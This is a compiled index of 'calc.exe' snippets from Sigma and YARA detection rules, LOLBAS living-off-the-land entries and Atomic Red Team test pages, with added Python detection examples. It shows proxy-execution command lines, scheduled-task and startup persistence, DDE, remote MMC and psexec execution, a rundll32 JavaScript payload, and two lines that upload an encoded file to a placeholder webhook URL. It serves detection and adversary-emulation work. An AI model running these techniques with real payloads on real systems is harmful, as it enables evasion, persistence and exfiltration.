sigma |
proc_creation_win_susp_calc.yml |
description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion |
DRL 1.0 |
sigma |
proc_creation_win_susp_calc.yml |
CommandLine|contains: '\calc.exe ' |
DRL 1.0 |
sigma |
proc_creation_win_susp_calc.yml |
Image|endswith: '\calc.exe' |
DRL 1.0 |
sigma |
proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml |
- https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf |
DRL 1.0 |
sigma |
proc_creation_win_susp_system_user_anomaly.yml |
- '\calc.exe' |
DRL 1.0 |
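The two Sigma selections above only make sense together with the rule's condition, so here is the matching logic replayed over a handful of constructed Sysmon-style process-creation events. This is an added example, not code from the Sigma project; the filter exempting calc.exe images under the Windows system directories is assumed from the rule's description (only the two selections appear on this page), and the event Ids and paths are made up.

```python
from typing import Dict, List, Optional, Tuple

# Assumed (not shown on this page): the rule's filter exempts a calc.exe image that lives
# in the Windows system directories. Sigma string matching is case-insensitive, so
# everything is lower-cased before comparison.
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\", "\\windows\\winsxs\\")


def susp_calc_verdict(event: Dict[str, str]) -> Optional[str]:
    """Return why a process-creation event matches proc_creation_win_susp_calc, or None."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    # selection: CommandLine|contains '\calc.exe '. The trailing space is the point:
    # calc.exe is followed by parameters, or it is itself an argument to another binary.
    if "\\calc.exe " in cmdline:
        return "command line contains '\\calc.exe ' (parameters, or calc.exe as an argument)"
    # selection2 and not filter: the calc.exe image itself, outside the system directories.
    if image.endswith("\\calc.exe") and not any(d in image for d in SYSTEM_DIRS):
        return "calc.exe image outside the Windows system directories"
    return None


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(Id, reason) for every event the rule would fire on, in input order."""
    hits = []
    for event in events:
        verdict = susp_calc_verdict(event)
        if verdict:
            hits.append((event["Id"], verdict))
    return hits


# Constructed events; the extrac32 line mirrors the LOLBAS entry for extrac32.exe further down.
SAMPLE_EVENTS = [
    {"Id": "legit", "Image": r"C:\Windows\System32\calc.exe",
     "CommandLine": r'"C:\Windows\System32\calc.exe"'},
    {"Id": "downloads", "Image": r"C:\Users\bob\Downloads\calc.exe",
     "CommandLine": r'"C:\Users\bob\Downloads\calc.exe"'},
    {"Id": "extrac32", "Image": r"C:\Windows\System32\extrac32.exe",
     "CommandLine": r"extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe"},
    {"Id": "with-args", "Image": r"C:\Windows\System32\calc.exe",
     "CommandLine": r"C:\Windows\System32\calc.exe C:\Temp\notes.txt"},
    # Blind spot: a bare name has no backslash, so neither selection fires on the proxy,
    # and the calc.exe child it spawns sits in System32 with no arguments.
    {"Id": "pcalua", "Image": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": "pcalua.exe -a calc.exe"},
]

if __name__ == "__main__":
    for event_id, reason in scan(SAMPLE_EVENTS):
        print(f"{event_id}: {reason}")
```

Two caveats fall out of running it: a launch written as `pcalua.exe -a calc.exe` never contains `\calc.exe`, so the rule is silent on that proxy and on the System32 child it spawns, and a quoted image path followed by an argument (`"C:\Windows\System32\calc.exe" x`) has `"` rather than a space after `calc.exe`, so the first selection misses it as well.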
LOLBAS |
Explorer.yml |
- Command: explorer.exe calc.exe |
|
LOLBAS |
Explorer.yml |
Description: 'Executes calc.exe as a subprocess of explorer.exe.' |
|
LOLBAS |
Gpup.yml |
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe |
|
LOLBAS |
Nvudisp.yml |
- Command: Nvudisp.exe System calc.exe |
|
LOLBAS |
Nvudisp.yml |
Description: Execute calc.exe as a subprocess. |
|
LOLBAS |
Nvudisp.yml |
- Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\" |
|
LOLBAS |
Nvuhda6.yml |
- Command: nvuhda6.exe System calc.exe |
|
LOLBAS |
Nvuhda6.yml |
Description: Execute calc.exe as a subprocess. |
|
LOLBAS |
Nvuhda6.yml |
- Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\" |
|
LOLBAS |
Nvuhda6.yml |
- Command: nvuhda6.exe KillApp calc.exe |
|
LOLBAS |
Usbinst.yml |
Description: Execute calc.exe through DefaultInstall Section Directive in INF file. |
|
LOLBAS |
Bash.yml |
- Command: bash.exe -c calc.exe |
|
LOLBAS |
Bash.yml |
Description: Executes calc.exe from bash.exe |
|
LOLBAS |
ConfigSecurityPolicy.yml |
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile |
|
LOLBAS |
DataSvcUtil.yml |
- Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile |
|
LOLBAS |
Diskshadow.yml |
- Command: diskshadow> exec calc.exe |
|
LOLBAS |
Explorer.yml |
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe" |
|
LOLBAS |
Explorer.yml |
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe |
|
LOLBAS |
Extrac32.yml |
- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe |
|
LOLBAS |
Extrac32.yml |
Description: Command for copying calc.exe to another folder |
|
LOLBAS |
Forfiles.yml |
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe |
|
LOLBAS |
Forfiles.yml |
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. |
|
LOLBAS |
Ftp.yml |
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt |
|
LOLBAS |
Hh.yml |
- Command: HH.exe c:\windows\system32\calc.exe |
|
LOLBAS |
Hh.yml |
Description: Executes calc.exe with HTML Help. |
|
LOLBAS |
Pcalua.yml |
- Command: pcalua.exe -a calc.exe |
|
LOLBAS |
Rundll32.yml |
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. |
|
LOLBAS |
Rundll32.yml |
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} |
|
LOLBAS |
Rundll32.yml |
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. |
|
LOLBAS |
Scriptrunner.yml |
- Command: Scriptrunner.exe -appvscript calc.exe |
|
LOLBAS |
Scriptrunner.yml |
Description: Executes calc.exe |
|
LOLBAS |
Ttdinject.yml |
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" |
|
LOLBAS |
Ttdinject.yml |
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" |
|
LOLBAS |
Tttracer.yml |
- Command: tttracer.exe C:\windows\system32\calc.exe |
|
LOLBAS |
Wlrmdr.yml |
- Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u calc.exe" |
|
LOLBAS |
Wlrmdr.yml |
Description: Execute calc.exe with wlrmdr.exe as parent process |
|
LOLBAS |
Advpack.yml |
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe |
|
LOLBAS |
Advpack.yml |
- Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
LOLBAS |
Ieadvpack.yml |
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe |
|
LOLBAS |
Ieadvpack.yml |
- Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
|
LOLBAS |
Pcwutl.yml |
- Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe |
|
LOLBAS |
Setupapi.yml |
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf |
|
LOLBAS |
Setupapi.yml |
- Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf |
|
LOLBAS |
Url.yml |
- Command: rundll32.exe url.dll,FileProtocolHandler calc.exe |
|
LOLBAS |
Zipfldr.yml |
- Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe |
|
LOLBAS |
Manage-bde.yml |
- Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf |
|
LOLBAS |
Appvlp.yml |
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" |
|
LOLBAS |
Sqltoolsps.yml |
- Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe |
|
LOLBAS |
Vsjitdebugger.yml |
- Command: Vsjitdebugger.exe calc.exe |
|
LOLBAS |
Vsjitdebugger.yml |
Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. |
|
LOLBAS |
Wsl.yml |
- Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe |
|
LOLBAS |
Wsl.yml |
Description: Executes calc.exe from wsl.exe |
|
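Read together, the LOLBAS entries above are a catalogue of parents that calc.exe should never have: the binary in front of calc.exe in each command line ends up as its parent, or as a grandparent when the proxy goes through PowerShell (Appvlp.yml). The following is an added example, not LOLBAS project code, that classifies calc.exe launches by walking that ancestry in a set of constructed Sysmon event-ID-1 records. The proxy list was assembled by hand from the command lines on this page (entries that only copy or upload calc.exe are omitted), the baseline of expected parents is an assumption, and the ProcessGuid values and install paths are invented.

```python
import ntpath
from typing import Dict, List, Optional, Tuple

# Executables that front calc.exe in the LOLBAS command lines on this page. cscript.exe stands
# in for the manage-bde.wsf COMSPEC trick, whose direct child is the redirected comspec.
# Hand-assembled for this example; not a list LOLBAS publishes.
LOLBAS_PROXY_PARENTS = {
    "appvlp.exe", "bash.exe", "cscript.exe", "diskshadow.exe", "forfiles.exe", "ftp.exe",
    "gpup.exe", "hh.exe", "nvudisp.exe", "nvuhda6.exe", "pcalua.exe", "rundll32.exe",
    "scriptrunner.exe", "sqltoolsps.exe", "ttdinject.exe", "tttracer.exe",
    "vsjitdebugger.exe", "wlrmdr.exe", "wsl.exe",
}
# Assumed baseline: parents an interactive user's calc.exe normally has.
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "svchost.exe"}


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def build_tree(events: List[dict]) -> Dict[str, dict]:
    return {e["ProcessGuid"]: e for e in events}


def ancestry(tree: Dict[str, dict], event: dict, max_depth: int = 4) -> List[str]:
    """Image names of the parent, grandparent, ... up to max_depth. When the parent's own
    creation event is outside the window, fall back to the ParentImage Sysmon recorded."""
    chain, cur = [], event
    for _ in range(max_depth):
        parent = tree.get(cur.get("ParentProcessGuid"))
        if parent is None:
            if cur.get("ParentImage"):
                chain.append(_name(cur["ParentImage"]))
            break
        chain.append(_name(parent["Image"]))
        cur = parent
    return chain


def classify(tree: Dict[str, dict], event: dict) -> Optional[str]:
    """Verdict for a calc.exe creation event, None for non-calc events and benign launches."""
    if _name(event["Image"]) != "calc.exe":
        return None
    chain = ancestry(tree, event)
    for depth, name in enumerate(chain, start=1):
        if name in LOLBAS_PROXY_PARENTS:
            return f"proxy execution via {name} at depth {depth}"
    if chain and chain[0] not in EXPECTED_PARENTS:
        return f"unexpected parent {chain[0]}"
    return None


def scan(events: List[dict]) -> List[Tuple[str, str]]:
    tree = build_tree(events)
    return [(e["ProcessGuid"], v) for e in events for v in [classify(tree, e)] if v]


def _ev(guid: str, image: str, parent_guid: str, parent_image: str) -> dict:
    return {"ProcessGuid": guid, "Image": image,
            "ParentProcessGuid": parent_guid, "ParentImage": parent_image}


# Constructed event window (GUIDs and paths invented).
SAMPLE_EVENTS = [
    _ev("G1", r"C:\Windows\explorer.exe", "G0", r"C:\Windows\System32\userinit.exe"),
    _ev("G2", r"C:\Windows\System32\calc.exe", "G1", r"C:\Windows\explorer.exe"),       # user launch
    _ev("G3", r"C:\Windows\System32\pcalua.exe", "G1", r"C:\Windows\explorer.exe"),
    _ev("G4", r"C:\Windows\System32\calc.exe", "G3", r"C:\Windows\System32\pcalua.exe"),  # pcalua -a calc.exe
    _ev("G5", r"C:\Program Files\Microsoft Office\root\Client\AppVLP.exe", "G1", r"C:\Windows\explorer.exe"),
    _ev("G6", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "G5",
        r"C:\Program Files\Microsoft Office\root\Client\AppVLP.exe"),
    _ev("G7", r"C:\Windows\System32\calc.exe", "G6",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),                # AppVLP -> powershell -> calc
    _ev("G8", r"C:\Windows\System32\calc.exe", "G99", r"C:\Windows\System32\wlrmdr.exe"),  # parent event not in window
    _ev("G9", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "G1", r"C:\Windows\explorer.exe"),
    _ev("G10", r"C:\Windows\System32\calc.exe", "G9",
        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),              # macro-driven launch
]

if __name__ == "__main__":
    for guid, verdict in scan(SAMPLE_EVENTS):
        print(guid, verdict)
```

Walking more than one level is what catches the AppVLP chain, where the direct parent is an ordinary powershell.exe. The two Explorer.yml entries remain a blind spot for any parent-based check, since `explorer.exe calc.exe` and `explorer.exe /root,...` leave a perfectly normal explorer.exe parent; those need the command line of the parent itself.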
atomic-red-team |
problem_report.md |
e.g. The atomic test executes and calc.exe is launched. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1021.003.md |
Upon successful execution, cmd will spawn calc.exe on a remote computer. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1021.003.md |
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1027.004.md |
| input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder\T1027.004\src\calc.cs| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1036.003.md |
| exe_path | path to exe to use when creating masquerading files | Path | C:\Windows\System32\calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1053.005.md |
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1053.005.md |
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1053.005.md |
$Action = New-ScheduledTaskAction -Execute "calc.exe" |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1106.md |
Execute program by leveraging Win32 APIs. By default, this will launch calc.exe from the command prompt. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1112.md |
| new_executable | New executable to run on startup instead of Windows Defender | String | calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1134.004.md |
calc.exe will be launched. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1140.md |
| executable | name of executable | Path | C:\Windows\System32\calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1140.md |
| executable | name of executable/file to decode | Path | C:\Windows\System32\calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1202.md |
Upon execution, calc.exe should open |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1202.md |
| payload_path | Path to payload | Path | C:\Windows\System32\calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1202.md |
| process | Process to execute | String | calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1202.md |
"This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1202.md |
Upon execution calc.exe will be opened. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1204.002.md |
Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1204.002.md |
$macrocode = "   Open ""#{bat_path}"" For Output As #1`n   Write #1, ""calc.exe""`n   Close #1`n   a = Shell(""cmd.exe /c $bat_path "", vbNormalFocus)`n" |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1204.002.md |
and pull down the script and execute it. By default the payload will execute calc.exe on the system. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1216.md |
Upon execution, calc.exe will be launched. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1216.md |
| command_to_execute | A command to execute. | Path | %windir%\System32\calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.md |
| powershell_code | PowerShell code to execute | String | Start-Process calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.md |
Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.md |
Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.001.md |
Upon execution calc.exe will open |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.002.md |
Upon execution calc.exe will be launched |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.005.md |
Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.005.md |
Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.010.md |
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.010.md |
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.011.md |
Upon execution calc.exe will be launched |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.011.md |
| command_to_execute | Command for rundll32.exe to execute | String | calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.011.md |
Upon successful execution, Calc.exe will spawn. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1546.012.md |
| target_binary | Binary To Attach To | Path | C:\Windows\System32\calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1546.013.md |
Appends a Start-Process cmdlet to the current user's PowerShell profile that points to a malicious executable. Upon execution, calc.exe will be launched. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1546.013.md |
| exe_path | Path the malicious executable | Path | calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1547.001.md |
$Target = "C:\Windows\System32\calc.exe" |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1547.001.md |
$ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1547.001.md |
Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1547.009.md |
Upon execution, calc.exe will be launched. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1547.009.md |
echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} |
MIT License. © 2018 Red Canary |
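The T1547.001 and T1547.009 entries above both plant a shortcut in the Startup folder whose target is a local binary rather than anything a shortcut would normally point at. A `.url` file is just an INI fragment with an `[InternetShortcut]` section, so the content check is cheap. The following is an added example, not Atomic Red Team code: it parses `.url` contents and flags targets that resolve to a local executable. The sample files are constructed (the first one is what the `echo URL=...` line above produces), and the list of executable extensions is an assumption for this example.

```python
import ntpath
from typing import Dict, List, Optional, Tuple

# Assumed set of extensions that ShellExecute will run rather than open in a viewer.
EXEC_EXTENSIONS = {".exe", ".bat", ".cmd", ".com", ".scr", ".vbs", ".vbe", ".js", ".jse",
                   ".wsf", ".wsh", ".hta", ".ps1", ".msi", ".lnk"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_url_file(text: str) -> Dict[str, str]:
    """Keys (lower-cased) of the [InternetShortcut] section of a .url file. A file written
    with a bare 'echo URL=... >> x.url' has no section header; keys seen before any header
    are treated as belonging to InternetShortcut so that variant is not silently ignored."""
    fields: Dict[str, str] = {}
    section = "internetshortcut"
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "internetshortcut" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def local_path_from_target(target: str) -> Optional[str]:
    """Windows path for a URL= value that points at the local machine, None for web targets."""
    t = target.strip().strip('"')
    low = t.lower()
    if low.startswith(REMOTE_SCHEMES):
        return None
    if low.startswith("file:"):                      # file:///C:/dir/x -> C:\dir\x
        return t[5:].lstrip("/").replace("/", "\\")
    if len(t) >= 3 and t[1] == ":" and t[2] in "\\/":  # drive-letter path
        return t
    if t.startswith("\\\\") or t.startswith("%"):    # UNC path or %ENVVAR%-prefixed path
        return t
    return None


def assess_url_shortcut(text: str) -> Optional[str]:
    """Reason the .url file deserves attention, or None for an ordinary web shortcut."""
    target = parse_url_file(text).get("url")
    if not target:
        return "no URL= target"
    path = local_path_from_target(target)
    if path is None:
        return None
    ext = ntpath.splitext(path)[1].lower()
    if ext in EXEC_EXTENSIONS:
        return f"local executable target: {path}"
    return f"local file target: {path}"


def scan_shortcuts(files: Dict[str, str]) -> List[Tuple[str, str]]:
    """(filename, reason) for every flagged .url file; files maps name -> contents."""
    return [(name, r) for name, body in files.items() for r in [assess_url_shortcut(body)] if r]


# Constructed contents of files as they would sit in
# %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.
CONSTRUCTED_FILES = {
    "calc_exe.url": "[InternetShortcut]\r\nURL=C:\\windows\\system32\\calc.exe\r\n",
    "docs.url": "[InternetShortcut]\r\nURL=https://example.com/docs\r\nIconIndex=0\r\n",
    "noheader.url": "URL=%windir%\\System32\\calc.exe\n",
    "report.url": "[InternetShortcut]\nURL=C:\\Users\\bob\\report.pdf\n",
}

if __name__ == "__main__":
    for name, reason in scan_shortcuts(CONSTRUCTED_FILES):
        print(f"{name}: {reason}")
```

The check is intentionally content-based rather than path-based: the same `.url` body is equally dangerous from the Run key or a scheduled task, and the Startup folder location only decides when it fires.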
atomic-red-team |
T1559.002.md |
{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" } |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1559.002.md |
9. DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1564.md |
This module extracts a binary (calc.exe) from inside of another binary. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1564.003.md |
Upon execution a hidden PowerShell window will launch calc.exe |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1564.003.md |
| powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1569.002.md |
Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1569.002.md |
#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1574.002.md |
Upon execution, calc.exe will be opened. |
MIT License. © 2018 Red Canary |
signature-base |
thor-webshells.yar |
$s7 = "\"\"%windir%\\calc.exe\"\")" |
CC BY-NC 4.0 |